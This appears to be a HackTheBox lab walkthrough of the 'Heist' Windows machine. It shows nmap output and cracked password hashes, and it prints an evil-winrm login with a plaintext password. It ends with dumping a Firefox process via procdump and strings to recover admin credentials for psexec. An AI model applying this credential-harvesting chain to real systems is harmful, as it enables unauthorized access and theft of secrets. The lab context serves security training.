We always start with an nmap scan…..
Nmap -sC -sV -oA nmap <Target-IP>
# Nmap 7.91 scan initiated Wed Jul 7 08:15:43 2021 as: nmap -sC -sV -oA nmap 10.10.10.149 Nmap scan report for 10.10.10.149 Host is up (0.51s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 | http-title: Support Login Page |_Requested resource was login.php 135/tcp open msrpc Microsoft Windows RPC 445/tcp open microsoft-ds? Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 3h00m54s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-07-07T10:17:59 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Jul 7 08:17:41 2021 -- 1 IP address (1 host up) scanned in 118.25 seconds
Another day another HackTheBox machine so we have our Nmap scan result but before going deep let try to scan if we have
winrm port open.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/retired/10.10.10.149] └─$ nmap -sV -sC -p 5985 10.10.10.149 Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-07 13:11 WAT Nmap scan report for heist.htb (10.10.10.149) Host is up (0.56s latency). PORT STATE SERVICE VERSION 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 22.52 seconds
Seems we have it open now let start our enumeration on SMB first.
We have no anonymous access to SMB now let hit HTTP.
Trying some default credentials i got no luck also maybe some SQL injection payloads got nothing but we still have
Login as guest let try it.
Issues comment ground seems cool also a user
hazard attach a file let try and check it out.
We have some hash passwords that belong to
hazard i think now let try cracking all.
The website i use in cracking it
0242114B0E143F015F5D1E161713 - $uperP@ssword 02375012182C1A1D751618034F36415408 - Q4)sJu\Y8qz*A3?d
One more hash to go i use john the ripper to crack that.
Now i think we have 3 users and 3 passwords.
rout3r hazard admin
$uperP@ssword Q4)sJu\Y8qz*A3?d stealth1agent
Which have try using on the login page form but i got no luck now time to go back to SMB maybe we can have access to the SMB trying different combination with the credentials i was able to list some shares with
Now let use
impacket to enumerate more users.
We have more users now but to cut the story short i was able to get in with
evil-winrm just the way i was able to get
evil-winrm -i heist.htb -u chase -p 'Q4)sJu\Y8qz*A3?d'
Going to the user
chase desktop and we have user.txt now we just need to owned the system now.
System / Administrator
I spend time enumerating the box so i notice a
firefox process running which is strange.
So i uploaded
procdump.exe and dumped one of these firefox processes.
upload procdump64.exe ./procdump64.exe -accepteula ./procdump64.exe -ma 2528
Then I uploaded strings.exe.
upload strings64.exe ./strings64.exe -accepteula
strings64.exe to view the firefox dump file.
Searching for password and i got the admin credentials
4dD!5}x/re8]FBuZ nice time to use
psexec.py to log in with the admin credentials we found in the firefox dump.
We are in and done let get the last flag.
And we are system.
Greeting From Muzec